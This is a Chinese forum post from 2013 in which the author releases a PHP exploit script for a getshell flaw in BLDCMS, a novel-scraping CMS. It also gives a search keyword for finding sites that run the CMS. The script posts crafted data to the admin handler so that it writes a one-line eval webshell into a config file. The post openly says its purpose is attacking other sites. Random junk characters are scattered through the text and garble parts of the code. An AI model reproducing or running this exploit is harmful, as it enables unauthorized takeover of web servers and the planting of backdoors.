之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞/ A' ^/ E! Q2 F
* T: f8 q& k( Q( }% |6 ~
7 L6 ?, e- u; t$ N* O( S
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 , I0 H3 ?7 n7 A6 I
* \6 Y9 M0 |: M0 e# V: Y既然都有人发了 我就把我之前写好的EXP放出来吧
6 H& |% z3 _' o; Y 1 T8 Z' b1 y8 O; [1 F
view source print?01.php;">
" X0 u, ^9 z' T Y02.<!--?php9 @* N" C2 e- M; @
03.echo "-------------------------------------------------------------------8 Z, @! v& |1 }
04.
# o$ d( Q3 ~- h6 S05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
" P* k( m1 b: u& {06. 9 s; `" {* O0 ~. ]9 [8 s
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
A: n% E @* A+ l' r. O3 i+ B08. " T6 P y7 C5 d0 P/ J
09.QQ:981009941\r\n 2013.3.21\r\n
- L7 u# z( G, Z0 }10.
$ w) m( M- S6 O% |0 t, P11. # a" B, f5 c/ N) k+ ?! J
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码' N+ j) L, G2 ]( n# }( ~+ J
13.
- y* j: o: i. ^/ J- [# s8 m14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n----------- m9 _$ w# N: }; i$ w! V# ^
15. $ I6 N) W1 C$ M4 l, U
16.--------------------------------------------------------------------\r\n";
) L0 b7 i, M! c8 s, w- J, U0 h; a17.$url=$argv[1];; N' Z. O0 _: S
18.$dir=$argv[2];
0 h. [& D; ^2 n19.$pass=$argv[3];
( |( m2 J; F6 e3 [! C/ G: Q% N* y20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';( a7 v- ? c. V1 E! [1 v; U7 Z9 l0 P
21.if (emptyempty($pass)||emptyempty($url))
( y8 z1 ]% H: _' O9 n22.{exit("请输入参数");}' h; k! b2 A j, C/ W
23.else
; Q# P/ Z! l7 I4 k% R2 h24.{
" C3 K! |( P: Z' a0 E25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
' Z4 N3 }6 A5 Q8 L/ J7 P8 w26.
" C! u0 L( Z/ V/ m* y8 A27.al;3 T9 w; [( `/ Q# t
28.$length = strlen($fuckdata);4 g. k! y& |5 a6 B
29.function getshell($url,$pass): l0 a( i2 S: v, T' E( K$ g
30.{
9 V/ z2 \# w n) @. W+ s; ?, C31.global $url,$dir,$pass,$eval,$length,$fuckdata; ]" k; c6 W# t( q
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
. o; {0 G8 B0 E- y( n) ^33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
: }( U# T4 m3 Y2 I34.$header .= "User-Agent: MSIE\r\n";
/ i3 c" K$ A, t& `0 T" F2 I6 H& R35.$header .= "Host:".$url."\r\n";
a5 \7 A" N5 y36.$header .= "Content-Length: ".$length."\r\n";
' s( n. g7 i' _6 G/ D37.$header .= "Connection: Close\r\n";
3 O6 Z4 x3 F: `- D+ g$ V% H$ N& _& ^, z38.$header .="\r\n";
! ]1 i* A7 {: m" Y6 s: i& p39.$header .= $fuckdata."\r\n\r\n";
C6 U( R5 b/ _9 b) f4 ^' t40.$fp = fsockopen($url, 80,$errno,$errstr,15);. \; y9 y7 `6 ?; f' K% \
41.if (!$fp)
$ M4 p7 Q0 k4 u! x) e: f42.{
1 O$ P# p% K9 h Q* K. q43.exit ("利用失败:请检查指定目标是否能正常打开");
9 o+ Z- }3 R9 A8 B* x. X# X6 J- N44.}9 W: @/ m# x5 x7 _5 @+ g
45.else{ if (!fputs($fp,$header))
# B" ?; A% u ^; i; v. d46.{exit ("利用失败");}
) a- E0 y" V! K4 Y! z! F9 l9 z; P47.else; A2 @; s M6 d' C) P3 a
48.{1 u8 N8 a8 A* L
49.$receive = '';
( V, U& O! g4 Q; a50.while (!feof($fp)) {# l. R$ m% Y8 M
51.$receive .= @fgets($fp, 1000);8 ?# G/ x5 w' Y% Z
52.}
0 i3 E2 ]2 c2 F1 [3 F53.@fclose($fp);
: B: s' q3 m# B! x% |4 S" n0 C. R54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标: N( z8 d- O8 C1 Q! a$ o& @) G/ P
55.
( I$ g) [1 C7 i% [- D56.GPC是否=off)";% X J9 T- f. K' [! ? a
57.}}
8 y) N- |" q" `+ p }58.}2 Q! o: d: ]$ b- z7 j, Q2 H
59.}
]" s0 `6 f" ^60.getshell($url,$pass);+ D( T4 X* x. z6 t/ U& {
61.?-->
6 f2 [: q" F% y2 S: L* X ) t- K& ~9 c7 g) \* B2 }
: v, G. k6 k" A$ C2 T- T- H
5 ]. p! R1 l5 Q, Vby 数据流+ ~* C) } P& @" d$ {
|
发表于 2013-3-26 20:49:10
收藏
支持
反对